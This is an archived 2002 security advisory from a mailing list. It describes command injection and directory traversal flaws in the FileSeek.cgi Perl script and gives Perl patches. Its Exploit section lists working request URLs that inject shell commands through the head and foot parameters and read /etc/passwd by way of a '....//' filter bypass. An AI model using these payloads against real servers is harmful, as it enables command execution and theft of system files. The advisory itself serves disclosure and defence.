OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: N|ghtHawk (nighthawkhackers4hackers.nl)
Date: Tue Apr 16 2002 - 13:42:30 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Best to read is the online version:
    http://www.dsinet.org/textfiles/advisories/FileSeek-advisory.txt

    ------------------------------
     FileSeek cgi script Advisory
    ------------------------------

    FileSeek.cgi / FileSeek2.cgi
    16/04/2002
    - by Thijs Bosschert (nighthawkhackers4hackers.org)

    -------------------
    Vendor Information:
    -------------------
    Homepage : http://www.cgi-perl.com
    Written by : Craig Patchett
    Vendor informed
     About bug : Months ago
     Mailed advisory: 14/04/02
    Vender Response : None yet
    Version on site : Still vulnerable

    -------------------
    Description:
    -------------------
    FileSeek is a cgi-script from "The CGI/Perl Cookbook from John Wiley &
    Sons". The script is written by Craig Patchett. It is being used to find
    and download files on a server.

    -------------------
    Affected Versions:
    -------------------
    All

    -------------------
    Vulnerability:
    -------------------
    There are 2 vulnerabilities in the script. The first is that the script
    doesn't filter escape characters to execute commands. This flaw has been
    found also by another group, the advisory of that can be found on:
    http://www.russiahack.com/advisories/adviseries112.txt

    The second vulnerability is a directory transversal bug which let you
    read any file on the server. This because of the script filtering "../"
    out of the request, which can be bypassed if the request uses "....//"
    which after filtering "../" out of it leaves "../" .

    -------------------
    Exploit:
    -------------------

    Command execution vulnerability:

    http://host/cgi-bin/FileSeek.cgi?head=&foot=;id|
    http://host/cgi-bin/FileSeek.cgi?head=;id|&foot=

    http://host/cgi-bin/FileSeek.cgi?head=&foot=|id|
    http://host/cgi-bin/FileSeek.cgi?head=|id|&foot=

    Directory transversal vulnerability:

    http://host/cgi-bin/FileSeek.cgi?head=&foot=....//....//....//....//....
    //....//....//etc/passwd
    http://host/cgi-bin/FileSeek.cgi?head=....//....//....//....//....//....
    //....//etc/passwd&foot=

    -------------------
    Patch:
    -------------------

    Patch for Command execution vulnerability:

    Add below the "Generate HTML page" part the following code:

    ########################################################################
    ####
       # Generate the HTML page
    #

    ########################################################################
    ####

       $ARGS{'head'} =~ tr/\|\;/XX/;
       $ARGS{'foot'} =~ tr/\|\;/XX/;

    This will make the request bogus if it contains a ; or |, so that it
    will result in an error.

    Patch for Directory transversal vulnerability:

    Change the following Part:

       # Make sure they're not trying to access an invalid directory

       if ($directory =~ /$DD\.\./) { $directory = '' }
       $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;
       $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.($DD|$))//g;

    Into:

       # Make sure they're not trying to access an invalid directory

       if ($directory =~ /$DD\.\./) { $directory = '' }
       $ARGS{'head'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;
       $ARGS{'foot'} =~ s/(^$ALLOWED_DIR)|(^$DD)|(\.\.)//g;

    This will make it filter on ".." and not on "../"

    -------------------